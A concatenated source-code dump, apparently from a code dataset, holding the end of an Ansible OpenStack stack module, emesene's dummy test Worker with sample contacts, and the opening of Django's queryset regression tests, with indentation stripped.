# Check for required parameters when state == 'present'
if state == 'present':
for p in ['template']:
if not module.params[p]:
module.fail_json(msg='%s required with present state' % p)
try:
cloud = shade.openstack_cloud(**module.params)
stack = cloud.get_stack(name)
if module.check_mode:
module.exit_json(changed=_system_state_change(module, stack,
cloud))
if state == 'present':
if not stack:
stack = _create_stack(module, stack, cloud)
else:
stack = _update_stack(module, stack, cloud)
changed = True
module.exit_json(changed=changed,
stack=stack,
id=stack.id)
elif state == 'absent':
if not stack:
changed = False
else:
changed = True
if not cloud.delete_stack(name, wait=module.params['wait']):
module.fail_json(msg='delete stack failed for stack: %s' % name)
module.exit_json(changed=changed)
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
| gpl-3.0 |
tiancj/emesene | emesene/e3/dummy/Worker.py | 1 | 13811 | # -*- coding: utf-8 -*-
import Queue
import random
import e3
import gobject
import time
import logging
log = logging.getLogger('dummy.Worker')
class Worker(e3.Worker):
'''dummy Worker implementation to make it easy to test emesene'''
def __init__(self, session, proxy, use_http=False, use_ipv6=False):
'''class constructor'''
e3.Worker.__init__(self, session)
def _fill_contact_list(self):
"""
method to fill the contact list with something
"""
self._add_contact('dx@emesene.org', 'XD', e3.status.ONLINE, '', False)
self._add_contact('roger@emesene.org', 'r0x0r', e3.status.ONLINE,
'', False)
self._add_contact('boyska@emesene.org', 'boyska', e3.status.ONLINE,
'', True)
self._add_contact('pochu@emesene.org', '<3 debian', e3.status.BUSY,
'', False)
self._add_contact('cloud@emesene.org', 'nube', e3.status.BUSY,
'', False)
self._add_contact('otacon@emesene.org', 'Otacon', e3.status.BUSY,
'', True)
self._add_contact('federico@emesene.org', 'federico..', e3.status.AWAY,
'he loves guiness', False)
self._add_contact('respawner@emesene.org', 'Respawner', e3.status.AWAY,
'', False)
self._add_contact('mohrtutchy@emesene.org', 'moh..', e3.status.AWAY,
'one love', True)
self._add_contact('nassty@emesene.org', 'nassto', e3.status.IDLE,
'', False)
self._add_contact('j0hn@emesene.org', 'juan', e3.status.IDLE, '', False)
self._add_contact('c0n0@emesene.org', 'conoconocono', e3.status.IDLE,
'', True)
self._add_contact('warlo@emesene.org', 'warlo', e3.status.OFFLINE,
'', False)
self._add_contact('wariano@emesene.org', 'wariano', e3.status.OFFLINE,
'', False)
self._add_contact('Faith_Nahn@emesene.org', 'Gtk styler',
e3.status.BUSY, '', False)
self._add_contact('you@emesene.org', 'I\'m on emesene code!',
e3.status.OFFLINE, '', True)
self._add_contact('one@hotmail.com', '- [b][c=48]Pαrκ¡[/c=30][/b]',
e3.status.BUSY, '', False)
self._add_contact('two@hotmail.com',
'[c=46]-๑๑test_test๑๑-[/c=2]', e3.status.BUSY, '', False)
self._add_contact('three@hotmail.com',
'[c=29]•°o.Orandom εïз stuff O.o°•[/c=36]·$28',
e3.status.BUSY, '', False)
self._add_contact('four@hotmail.com',
'[c=48][b]hy[/b][/c=11] ·#·$3,3\'_·$#fcfcfc,#fcfcfc\'_·$4,4\'_·0·$28',
e3.status.ONLINE, '', False)
self._add_contact('five@hotmail.com',
'·&·#·$9X.|̲̅·$10X·$9̲̅·$10x·$9̲̅·$10x·$9̲̅·$10x·$9̲̅·$10x·$9̲̅|·$10·#',
e3.status.BUSY, '', False)
self._add_contact('six@hotmail.com', '[c=46][u][b]xafd! [/b][/u][/c]',
e3.status.BUSY, '', False)
self._add_contact('seven@hotmail.com',
'[c=5]((_...sdsdf..._))..)_<(_))(°.°)(...][/c=48][u][/u]',
e3.status.BUSY, '', False)
self._add_contact('eight@hotmail.com',
'[i][B][C=12]☆[/C=0][C=0]☆[/C=12][c=12]☆[/c=0] (W) [C=12]Bellamezz[/c=49] (F) [c=0]☆[/c=0][c=12]☆[/c=12][c=0]☆[/c=0][/B][/i]',
e3.status.AWAY, '', False)
self._add_contact('nine@hotmail.com',
'[b](*) ... [c=12]Ricky[/c=33] ...(*)[/b]',
e3.status.BUSY, '', False)
self._add_contact('ten@hotmail.com',
'<:o)[c=yellow]Yellow:DYellow[/c][c=red]Red[c=blue]Blue:)Blue[c=green]Green[/c][/c][/c]',
e3.status.BUSY, '', False)
self._add_contact('eleven@hotmail.com',
'·$,32·$59«·$,41·$50«·$,50·$41«·$,59·$32«·$,66·$23«·$32,1« :: nube ::»·$,66·$23»·$,59·$32»·$,50·$41»·$,41·$50»·$,32·$59»·0 ·$0',
e3.status.AWAY, '', False)
self._add_contact('twelve@hotmail.com',
'·$4Red·$11Aqua·$6,8PurpleOnYellow·$14GrayOnYellow·0Black·$9Lime',
e3.status.BUSY, '', False)
self._add_contact('thirteen@hotmail.com',
'[c=7][b][I am][/c=yellow][/b][c=70][/c=89][c=89] so [A]wesome that [I] only use invalid tags [/c]',
e3.status.ONLINE, '', False,
'[ I am ] so [ A ]wesome that [ I ] only use invalid tags ')
self._add_contact('fourteen@hotmail.com',
'")':)(H);)"\')',
e3.status.BUSY, '', False,
'\")'(emo)(emo)(emo)"\')')
self._add_contact('fifteen@hotmail.com',
'1:)2;)3\')4\')5;)6:)7',
e3.status.BUSY, '', False,
'1(emo)2(emo)3(emo)4(emo)5(emo)6(emo)7')
self._add_contact('sixteen@hotmail.com',
'[C=80][i][b][I][/b]Single i[/i][/c=30][b][/C]Single /C[/B]',
e3.status.OFFLINE, '', False,
'[ i ]Single i[ /C ]Single /C')
self._add_contact('seventeen@hotmail.com',
'[/c][c=48][c=12][b]Colorful nickname[/b][/c=50]',
e3.status.OFFLINE, '', False,
'[ /c ][ c=48 ]Colorful nickname')
self._add_group('ninjas')
self._add_group('pirätes')
self._add_group('lulz')
self._add_group('code quiz ninjas')
self._add_group('empty')
self._add_group('strange nicks')
self._add_contact_to_group('you@emesene.org', 'pirätes')
self._add_contact_to_group('boyska@emesene.org', 'pirätes')
self._add_contact_to_group('j0hn@emesene.org', 'pirätes')
self._add_contact_to_group('c0n0@emesene.org', 'pirätes')
self._add_contact_to_group('nassty@emesene.org', 'lulz')
self._add_contact_to_group('warlo@emesene.org', 'lulz')
self._add_contact_to_group('you@emesene.org', 'lulz')
self._add_contact_to_group('cloud@emesene.org', 'lulz')
self._add_contact_to_group('dx@emesene.org', 'ninjas')
self._add_contact_to_group('roger@emesene.org', 'ninjas')
self._add_contact_to_group('c0n0@emesene.org', 'ninjas')
self._add_contact_to_group('boyska@emesene.org', 'ninjas')
self._add_contact_to_group('Faith_Nahn@emesene.org', 'code quiz ninjas')
self._add_contact_to_group('one@hotmail.com', 'strange nicks')
self._add_contact_to_group('two@hotmail.com', 'strange nicks')
self._add_contact_to_group('three@hotmail.com', 'strange nicks')
self._add_contact_to_group('four@hotmail.com', 'strange nicks')
self._add_contact_to_group('five@hotmail.com', 'strange nicks')
self._add_contact_to_group('six@hotmail.com', 'strange nicks')
self._add_contact_to_group('seven@hotmail.com', 'strange nicks')
self._add_contact_to_group('eight@hotmail.com', 'strange nicks')
self._add_contact_to_group('nine@hotmail.com', 'strange nicks')
self._add_contact_to_group('ten@hotmail.com', 'strange nicks')
self._add_contact_to_group('eleven@hotmail.com', 'strange nicks')
self._add_contact_to_group('twelve@hotmail.com', 'strange nicks')
self._add_contact_to_group('thirteen@hotmail.com', 'strange nicks')
self._add_contact_to_group('fourteen@hotmail.com', 'strange nicks')
self._add_contact_to_group('fifteen@hotmail.com', 'strange nicks')
self._add_contact_to_group('sixteen@hotmail.com', 'strange nicks')
#test pending contact dialog
#self._add_pending_contacts()
def _add_pending_contacts(self):
tmp_cont = e3.base.Contact("test1@test.com", 1,
"test1", "test1nick",
e3.status.BUSY, '',
True)
self.session.contacts.pending["test1@test.com"] = tmp_cont
tmp_cont = e3.base.Contact("test2@test.com", 2,
"test2", "test2nick",
e3.status.ONLINE, '',
True)
self.session.contacts.pending["test2@test.com"] = tmp_cont
def _late_contact_add(self):
'''this simulates adding a contact after we show the contactlist'''
tmp_cont = e3.base.Contact("testlate1@test.com", 1,
"testlate1", "testlate1nick",
e3.status.BUSY, '',
True)
self.session.contacts.pending["testlate1@test.com"] = tmp_cont
self.session.contact_added_you()
return False
def _return_message(self, cid, account, message):
''' Method to return a message after some timeout '''
self.session.conv_message(cid, account, message)
message.account = account
e3.Logger.log_message(self.session, None, message, False)
return False
def _add_contact(self, mail, nick, status_, alias, blocked, msg="..."):
"""
method to add a contact to the contact list
"""
self.session.contacts.contacts[mail] = e3.Contact(mail, mail,
nick, msg, status_, alias, blocked)
def _add_group(self, name):
"""
method to add a group to the contact list
"""
self.session.groups[name] = e3.Group(name, name)
def _add_contact_to_group(self, account, group):
"""
method to add a contact to a group
"""
self.session.groups[group].contacts.append(account)
self.session.contacts.contacts[account].groups.append(group)
# action handlers
def _handle_action_add_contact(self, account):
'''handle Action.ACTION_ADD_CONTACT
'''
self.session.contact_add_succeed(account)
def _handle_action_add_group(self, name):
'''handle Action.ACTION_ADD_GROUP
'''
self.session.group_add_succeed(name)
def _handle_action_add_to_group(self, account, gid):
'''handle Action.ACTION_ADD_TO_GROUP
'''
self.session.group_add_contact_succeed(gid, account)
def _handle_action_block_contact(self, account):
'''handle Action.ACTION_BLOCK_CONTACT
'''
self.session.contact_block_succeed(account)
def _handle_action_unblock_contact(self, account):
'''handle Action.ACTION_UNBLOCK_CONTACT
'''
self.session.contact_unblock_succeed(account)
def _handle_action_change_status(self, status_):
'''handle Action.ACTION_CHANGE_STATUS
'''
self.session.account.status = status_
self.session.contacts.me.status = status_
self.session.status_change_succeed(status_)
def _handle_action_login(self, account, password, status_):
'''handle Action.ACTION_LOGIN
'''
self.session.login_succeed()
self.session.nick_change_succeed('dummy nick is dummy')
self._fill_contact_list()
self.session.contact_list_ready()
#gobject.timeout_add_seconds(4, self._late_contact_add)
#memleak checks
from e3.base.Event import Event
#self.session.add_event(Event.EVENT_DISCONNECTED,
# 'CHECKING MEMLEAKS :D', 1)
def _handle_action_logout(self):
'''handle Action.ACTION_LOGOUT
'''
def _handle_action_move_to_group(self, account, src_gid, dest_gid):
'''handle Action.ACTION_MOVE_TO_GROUP
'''
self.session.contact_move_succeed(account, src_gid, dest_gid)
def _handle_action_remove_contact(self, account):
'''handle Action.ACTION_REMOVE_CONTACT
'''
self.session.contact_remove_succeed(account)
def _handle_action_reject_contact(self, account):
'''handle Action.ACTION_REJECT_CONTACT
'''
self.session.contact_reject_succeed(account)
def _handle_action_remove_from_group(self, account, gid):
'''handle Action.ACTION_REMOVE_FROM_GROUP
'''
self.session.group_remove_contact_succeed(gid, account)
def _handle_action_remove_group(self, gid):
'''handle Action.ACTION_REMOVE_GROUP
'''
self.session.group_remove_succeed(gid)
def _handle_action_rename_group(self, gid, name):
'''handle Action.ACTION_RENAME_GROUP
'''
self.session.group_rename_succeed(gid, name)
def _handle_action_set_contact_alias(self, account, alias):
'''handle Action.ACTION_SET_CONTACT_ALIAS
'''
self.session.contact_alias_succeed(account)
def _handle_action_set_message(self, message):
'''handle Action.ACTION_SET_MESSAGE
'''
self.session.message_change_succeed(message)
def _handle_action_set_nick(self, nick):
'''handle Action.ACTION_SET_NICK
'''
self.session.nick_change_succeed(nick)
def _handle_action_set_picture(self, picture_name):
'''handle Action.ACTION_SET_PICTURE
'''
self.session.contacts.me.picture = picture_name
self.session.picture_change_succeed(self.session.account.account,
picture_name)
def _handle_action_new_conversation(self, account, cid):
'''handle Action.ACTION_NEW_CONVERSATION
'''
pass
def _handle_action_close_conversation(self, cid):
'''handle Action.ACTION_CLOSE_CONVERSATION
'''
pass
def _handle_action_send_message(self, cid, message):
'''handle Action.ACTION_SEND_MESSAGE
cid is the conversation id, message is a Message object
'''
self.session.conv_message_send_succeed(cid, message)
account = random.choice(self.session.contacts.contacts.keys())
e3.Logger.log_message(self.session, [account], message, True)
gobject.timeout_add_seconds(1, self._return_message, cid, account, message)
| gpl-3.0 |
HonzaKral/django | tests/queries/tests.py | 14 | 154710 | from __future__ import unicode_literals
import datetime
import pickle
import unittest
from collections import OrderedDict
from operator import attrgetter
from django.core.exceptions import FieldError
from django.db import DEFAULT_DB_ALIAS, connection
from django.db.models import F, Q, Count
from django.db.models.sql.constants import LOUTER
from django.db.models.sql.datastructures import EmptyResultSet
from django.db.models.sql.where import NothingNode, WhereNode
from django.test import TestCase, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from django.utils import six
from django.utils.six.moves import range
from .models import (
FK1, X, Annotation, Article, Author, BaseA, Book, CategoryItem,
CategoryRelationship, Celebrity, Channel, Chapter, Child, ChildObjectA,
Classroom, Company, Cover, CustomPk, CustomPkTag, Detail, DumbCategory,
Eaten, Employment, ExtraInfo, Fan, Food, Identifier, Individual, Item, Job,
JobResponsibilities, Join, LeafA, LeafB, LoopX, LoopZ, ManagedModel,
Member, ModelA, ModelB, ModelC, ModelD, MyObject, NamedCategory, Node,
Note, NullableName, Number, ObjectA, ObjectB, ObjectC, OneToOneCategory,
Order, OrderItem, Page, Paragraph, Person, Plaything, PointerA, Program,
ProxyCategory, ProxyObjectA, ProxyObjectB, Ranking, Related,
RelatedIndividual, RelatedObject, Report, ReservedName, Responsibility,
School, SharedConnection, SimpleCategory, SingleObject, SpecialCategory,
Staff, StaffUser, Student, Tag, Task, Ticket21203Child, Ticket21203Parent,
Ticket23605A, Ticket23605B, Ticket23605C, TvChef, Valid,
)
class BaseQuerysetTest(TestCase):
def assertValueQuerysetEqual(self, qs, values):
return self.assertQuerysetEqual(qs, values, transform=lambda x: x)
class Queries1Tests(BaseQuerysetTest):
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
cls.t1 = Tag.objects.create(name='t1', category=generic)
cls.t2 = Tag.objects.create(name='t2', parent=cls.t1, category=generic)
cls.t3 = Tag.objects.create(name='t3', parent=cls.t1)
t4 = Tag.objects.create(name='t4', parent=cls.t3)
cls.t5 = Tag.objects.create(name='t5', parent=cls.t3)
cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
n2 = Note.objects.create(note='n2', misc='bar', id=2)
cls.n3 = Note.objects.create(note='n3', misc='foo', id=3)
ann1 = Annotation.objects.create(name='a1', tag=cls.t1)
ann1.notes.add(cls.n1)
ann2 = Annotation.objects.create(name='a2', tag=t4)
ann2.notes.add(n2, cls.n3)
# Create these out of order so that sorting by 'id' will be different to sorting
# by 'info'. Helps detect some problems later.
cls.e2 = ExtraInfo.objects.create(info='e2', note=n2, value=41)
e1 = ExtraInfo.objects.create(info='e1', note=cls.n1, value=42)
cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
cls.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
a3 = Author.objects.create(name='a3', num=3003, extra=cls.e2)
cls.a4 = Author.objects.create(name='a4', num=4004, extra=cls.e2)
cls.time1 = datetime.datetime(2007, 12, 19, 22, 25, 0)
cls.time2 = datetime.datetime(2007, 12, 19, 21, 0, 0)
time3 = datetime.datetime(2007, 12, 20, 22, 25, 0)
time4 = datetime.datetime(2007, 12, 20, 21, 0, 0)
cls.i1 = Item.objects.create(name='one', created=cls.time1, modified=cls.time1, creator=cls.a1, note=cls.n3)
cls.i1.tags = [cls.t1, cls.t2]
cls.i2 = Item.objects.create(name='two', created=cls.time2, creator=cls.a2, note=n2)
cls.i2.tags = [cls.t1, cls.t3]
cls.i3 = Item.objects.create(name='three', created=time3, creator=cls.a2, note=cls.n3)
i4 = Item.objects.create(name='four', created=time4, creator=cls.a4, note=cls.n3)
i4.tags = [t4]
cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
Report.objects.create(name='r2', creator=a3)
Report.objects.create(name='r3')
# Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the Meta.ordering
# will be rank3, rank2, rank1.
cls.rank1 = Ranking.objects.create(rank=2, author=cls.a2)
Cover.objects.create(title="first", item=i4)
Cover.objects.create(title="second", item=cls.i2)
def test_subquery_condition(self):
qs1 = Tag.objects.filter(pk__lte=0)
qs2 = Tag.objects.filter(parent__in=qs1)
qs3 = Tag.objects.filter(parent__in=qs2)
self.assertEqual(qs3.query.subq_aliases, {'T', 'U', 'V'})
self.assertIn('v0', str(qs3.query).lower())
qs4 = qs3.filter(parent__in=qs1)
self.assertEqual(qs4.query.subq_aliases, {'T', 'U', 'V'})
# It is possible to reuse U for the second subquery, no need to use W.
self.assertNotIn('w0', str(qs4.query).lower())
# So, 'U0."id"' is referenced twice.
self.assertTrue(str(qs4.query).lower().count('u0'), 2)
def test_ticket1050(self):
self.assertQuerysetEqual(
Item.objects.filter(tags__isnull=True),
['<Item: three>']
)
self.assertQuerysetEqual(
Item.objects.filter(tags__id__isnull=True),
['<Item: three>']
)
def test_ticket1801(self):
self.assertQuerysetEqual(
Author.objects.filter(item=self.i2),
['<Author: a2>']
)
self.assertQuerysetEqual(
Author.objects.filter(item=self.i3),
['<Author: a2>']
)
self.assertQuerysetEqual(
Author.objects.filter(item=self.i2) & Author.objects.filter(item=self.i3),
['<Author: a2>']
)
def test_ticket2306(self):
# Checking that no join types are "left outer" joins.
query = Item.objects.filter(tags=self.t2).query
self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
self.assertQuerysetEqual(
Item.objects.filter(Q(tags=self.t1)).order_by('name'),
['<Item: one>', '<Item: two>']
)
self.assertQuerysetEqual(
Item.objects.filter(Q(tags=self.t1)).filter(Q(tags=self.t2)),
['<Item: one>']
)
self.assertQuerysetEqual(
Item.objects.filter(Q(tags=self.t1)).filter(Q(creator__name='fred') | Q(tags=self.t2)),
['<Item: one>']
)
# Each filter call is processed "at once" against a single table, so this is
# different from the previous example as it tries to find tags that are two
# things at once (rather than two tags).
self.assertQuerysetEqual(
Item.objects.filter(Q(tags=self.t1) & Q(tags=self.t2)),
[]
)
self.assertQuerysetEqual(
Item.objects.filter(Q(tags=self.t1), Q(creator__name='fred') | Q(tags=self.t2)),
[]
)
qs = Author.objects.filter(ranking__rank=2, ranking__id=self.rank1.id)
self.assertQuerysetEqual(list(qs), ['<Author: a2>'])
self.assertEqual(2, qs.query.count_active_tables(), 2)
qs = Author.objects.filter(ranking__rank=2).filter(ranking__id=self.rank1.id)
self.assertEqual(qs.query.count_active_tables(), 3)
def test_ticket4464(self):
self.assertQuerysetEqual(
Item.objects.filter(tags=self.t1).filter(tags=self.t2),
['<Item: one>']
)
self.assertQuerysetEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name'),
['<Item: one>', '<Item: two>']
)
self.assertQuerysetEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).filter(tags=self.t3),
['<Item: two>']
)
# Make sure .distinct() works with slicing (this was broken in Oracle).
self.assertQuerysetEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).order_by('name')[:3],
['<Item: one>', '<Item: one>', '<Item: two>']
)
self.assertQuerysetEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name')[:3],
['<Item: one>', '<Item: two>']
)
def test_tickets_2080_3592(self):
self.assertQuerysetEqual(
Author.objects.filter(item__name='one') | Author.objects.filter(name='a3'),
['<Author: a1>', '<Author: a3>']
)
self.assertQuerysetEqual(
Author.objects.filter(Q(item__name='one') | Q(name='a3')),
['<Author: a1>', '<Author: a3>']
)
self.assertQuerysetEqual(
Author.objects.filter(Q(name='a3') | Q(item__name='one')),
['<Author: a1>', '<Author: a3>']
)
self.assertQuerysetEqual(
Author.objects.filter(Q(item__name='three') | Q(report__name='r3')),
['<Author: a2>']
)
def test_ticket6074(self):
# Merging two empty result sets shouldn't leave a queryset with no constraints
# (which would match everything).
self.assertQuerysetEqual(Author.objects.filter(Q(id__in=[])), [])
self.assertQuerysetEqual(
Author.objects.filter(Q(id__in=[]) | Q(id__in=[])),
[]
)
def test_tickets_1878_2939(self):
self.assertEqual(Item.objects.values('creator').distinct().count(), 3)
# Create something with a duplicate 'name' so that we can test multi-column
# cases (which require some tricky SQL transformations under the covers).
xx = Item(name='four', created=self.time1, creator=self.a2, note=self.n1)
xx.save()
self.assertEqual(
Item.objects.exclude(name='two').values('creator', 'name').distinct().count(),
4
)
self.assertEqual(
Item.objects.exclude(name='two').extra(select={'foo': '%s'}, select_params=(1,)).values('creator', 'name', 'foo').distinct().count(),
4
)
self.assertEqual(
Item.objects.exclude(name='two').extra(select={'foo': '%s'}, select_params=(1,)).values('creator', 'name').distinct().count(),
4
)
xx.delete()
def test_ticket7323(self):
self.assertEqual(Item.objects.values('creator', 'name').count(), 4)
def test_ticket2253(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
self.assertQuerysetEqual(
q1,
['<Item: four>', '<Item: one>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual(q2, ['<Item: one>'])
self.assertQuerysetEqual(
(q1 | q2).order_by('name'),
['<Item: four>', '<Item: one>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual((q1 & q2).order_by('name'), ['<Item: one>'])
q1 = Item.objects.filter(tags=self.t1)
q2 = Item.objects.filter(note=self.n3, tags=self.t2)
q3 = Item.objects.filter(creator=self.a4)
self.assertQuerysetEqual(
((q1 & q2) | q3).order_by('name'),
['<Item: four>', '<Item: one>']
)
def test_order_by_tables(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
list(q2)
combined_query = (q1 & q2).order_by('name').query
self.assertEqual(len([
t for t in combined_query.tables if combined_query.alias_refcount[t]
]), 1)
def test_order_by_join_unref(self):
"""
This test is related to the above one, testing that there aren't
old JOINs in the query.
"""
qs = Celebrity.objects.order_by('greatest_fan__fan_of')
self.assertIn('OUTER JOIN', str(qs.query))
qs = qs.order_by('id')
self.assertNotIn('OUTER JOIN', str(qs.query))
def test_tickets_4088_4306(self):
self.assertQuerysetEqual(
Report.objects.filter(creator=1001),
['<Report: r1>']
)
self.assertQuerysetEqual(
Report.objects.filter(creator__num=1001),
['<Report: r1>']
)
self.assertQuerysetEqual(Report.objects.filter(creator__id=1001), [])
self.assertQuerysetEqual(
Report.objects.filter(creator__id=self.a1.id),
['<Report: r1>']
)
self.assertQuerysetEqual(
Report.objects.filter(creator__name='a1'),
['<Report: r1>']
)
def test_ticket4510(self):
self.assertQuerysetEqual(
Author.objects.filter(report__name='r1'),
['<Author: a1>']
)
def test_ticket7378(self):
self.assertQuerysetEqual(self.a1.report_set.all(), ['<Report: r1>'])
def test_tickets_5324_6704(self):
self.assertQuerysetEqual(
Item.objects.filter(tags__name='t4'),
['<Item: four>']
)
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t4').order_by('name').distinct(),
['<Item: one>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t4').order_by('name').distinct().reverse(),
['<Item: two>', '<Item: three>', '<Item: one>']
)
self.assertQuerysetEqual(
Author.objects.exclude(item__name='one').distinct().order_by('name'),
['<Author: a2>', '<Author: a3>', '<Author: a4>']
)
# Excluding across a m2m relation when there is more than one related
# object associated was problematic.
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t1').order_by('name'),
['<Item: four>', '<Item: three>']
)
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t1').exclude(tags__name='t4'),
['<Item: three>']
)
# Excluding from a relation that cannot be NULL should not use outer joins.
query = Item.objects.exclude(creator__in=[self.a1, self.a2]).query
self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
# Similarly, when one of the joins cannot possibly, ever, involve NULL
# values (Author -> ExtraInfo, in the following), it should never be
# promoted to a left outer join. So the following query should only
# involve one "left outer" join (Author -> Item is 0-to-many).
qs = Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3))
self.assertEqual(
len([x for x in qs.query.alias_map.values() if x.join_type == LOUTER and qs.query.alias_refcount[x.table_alias]]),
1
)
# The previous changes shouldn't affect nullable foreign key joins.
self.assertQuerysetEqual(
Tag.objects.filter(parent__isnull=True).order_by('name'),
['<Tag: t1>']
)
self.assertQuerysetEqual(
Tag.objects.exclude(parent__isnull=True).order_by('name'),
['<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
)
self.assertQuerysetEqual(
Tag.objects.exclude(Q(parent__name='t1') | Q(parent__isnull=True)).order_by('name'),
['<Tag: t4>', '<Tag: t5>']
)
self.assertQuerysetEqual(
Tag.objects.exclude(Q(parent__isnull=True) | Q(parent__name='t1')).order_by('name'),
['<Tag: t4>', '<Tag: t5>']
)
self.assertQuerysetEqual(
Tag.objects.exclude(Q(parent__parent__isnull=True)).order_by('name'),
['<Tag: t4>', '<Tag: t5>']
)
self.assertQuerysetEqual(
Tag.objects.filter(~Q(parent__parent__isnull=True)).order_by('name'),
['<Tag: t4>', '<Tag: t5>']
)
def test_ticket2091(self):
t = Tag.objects.get(name='t4')
self.assertQuerysetEqual(
Item.objects.filter(tags__in=[t]),
['<Item: four>']
)
def test_avoid_infinite_loop_on_too_many_subqueries(self):
x = Tag.objects.filter(pk=1)
local_recursion_limit = 127
msg = 'Maximum recursion depth exceeded: too many subqueries.'
with self.assertRaisesMessage(RuntimeError, msg):
for i in six.moves.range(local_recursion_limit * 2):
x = Tag.objects.filter(pk__in=x)
def test_reasonable_number_of_subq_aliases(self):
x = Tag.objects.filter(pk=1)
for _ in range(20):
x = Tag.objects.filter(pk__in=x)
self.assertEqual(
x.query.subq_aliases, {
'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD',
'AE', 'AF', 'AG', 'AH', 'AI', 'AJ', 'AK', 'AL', 'AM', 'AN',
}
)
def test_heterogeneous_qs_combination(self):
# Combining querysets built on different models should behave in a well-defined
# fashion. We raise an error.
self.assertRaisesMessage(
AssertionError,
'Cannot combine queries on two different base models.',
lambda: Author.objects.all() & Tag.objects.all()
)
self.assertRaisesMessage(
AssertionError,
'Cannot combine queries on two different base models.',
lambda: Author.objects.all() | Tag.objects.all()
)
def test_ticket3141(self):
self.assertEqual(Author.objects.extra(select={'foo': '1'}).count(), 4)
self.assertEqual(
Author.objects.extra(select={'foo': '%s'}, select_params=(1,)).count(),
4
)
def test_ticket2400(self):
self.assertQuerysetEqual(
Author.objects.filter(item__isnull=True),
['<Author: a3>']
)
self.assertQuerysetEqual(
Tag.objects.filter(item__isnull=True),
['<Tag: t5>']
)
def test_ticket2496(self):
self.assertQuerysetEqual(
Item.objects.extra(tables=['queries_author']).select_related().order_by('name')[:1],
['<Item: four>']
)
def test_error_raised_on_filter_with_dictionary(self):
with self.assertRaisesMessage(FieldError, 'Cannot parse keyword query as dict'):
Note.objects.filter({'note': 'n1', 'misc': 'foo'})
def test_tickets_2076_7256(self):
# Ordering on related tables should be possible, even if the table is
# not otherwise involved.
self.assertQuerysetEqual(
Item.objects.order_by('note__note', 'name'),
['<Item: two>', '<Item: four>', '<Item: one>', '<Item: three>']
)
# Ordering on a related field should use the remote model's default
# ordering as a final step.
self.assertQuerysetEqual(
Author.objects.order_by('extra', '-name'),
['<Author: a2>', '<Author: a1>', '<Author: a4>', '<Author: a3>']
)
# Using remote model default ordering can span multiple models (in this
# case, Cover is ordered by Item's default, which uses Note's default).
self.assertQuerysetEqual(
Cover.objects.all(),
['<Cover: first>', '<Cover: second>']
)
# If the remote model does not have a default ordering, we order by its 'id'
# field.
self.assertQuerysetEqual(
Item.objects.order_by('creator', 'name'),
['<Item: one>', '<Item: three>', '<Item: two>', '<Item: four>']
)
# Ordering by a many-valued attribute (e.g. a many-to-many or reverse
# ForeignKey) is legal, but the results might not make sense. That
# isn't Django's problem. Garbage in, garbage out.
self.assertQuerysetEqual(
Item.objects.filter(tags__isnull=False).order_by('tags', 'id'),
['<Item: one>', '<Item: two>', '<Item: one>', '<Item: two>', '<Item: four>']
)
# If we replace the default ordering, Django adjusts the required
# tables automatically. Item normally requires a join with Note to do
# the default ordering, but that isn't needed here.
qs = Item.objects.order_by('name')
self.assertQuerysetEqual(
qs,
['<Item: four>', '<Item: one>', '<Item: three>', '<Item: two>']
)
self.assertEqual(len(qs.query.tables), 1)
def test_tickets_2874_3002(self):
qs = Item.objects.select_related().order_by('note__note', 'name')
self.assertQuerysetEqual(
qs,
['<Item: two>', '<Item: four>', '<Item: one>', '<Item: three>']
)
# This is also a good select_related() test because there are multiple
# Note entries in the SQL. The two Note items should be different.
self.assertTrue(repr(qs[0].note), '<Note: n2>')
self.assertEqual(repr(qs[0].creator.extra.note), '<Note: n1>')
def test_ticket3037(self):
self.assertQuerysetEqual(
Item.objects.filter(Q(creator__name='a3', name='two') | Q(creator__name='a4', name='four')),
['<Item: four>']
)
def test_tickets_5321_7070(self):
# Ordering columns must be included in the output columns. Note that
# this means results that might otherwise be distinct are not (if there
# are multiple values in the ordering cols), as in this example. This
# isn't a bug; it's a warning to be careful with the selection of
# ordering columns.
self.assertValueQuerysetEqual(
Note.objects.values('misc').distinct().order_by('note', '-misc'),
[{'misc': 'foo'}, {'misc': 'bar'}, {'misc': 'foo'}]
)
def test_ticket4358(self):
# If you don't pass any fields to values(), relation fields are
# returned as "foo_id" keys, not "foo". For consistency, you should be
# able to pass "foo_id" in the fields list and have it work, too. We
# actually allow both "foo" and "foo_id".
# The *_id version is returned by default.
self.assertIn('note_id', ExtraInfo.objects.values()[0])
# You can also pass it in explicitly.
self.assertValueQuerysetEqual(
ExtraInfo.objects.values('note_id'),
[{'note_id': 1}, {'note_id': 2}]
)
# ...or use the field name.
self.assertValueQuerysetEqual(
ExtraInfo.objects.values('note'),
[{'note': 1}, {'note': 2}]
)
def test_ticket2902(self):
# Parameters can be given to extra_select, *if* you use an OrderedDict.
# (First we need to know which order the keys fall in "naturally" on
# your system, so we can put things in the wrong way around from
# normal. A normal dict would thus fail.)
s = [('a', '%s'), ('b', '%s')]
params = ['one', 'two']
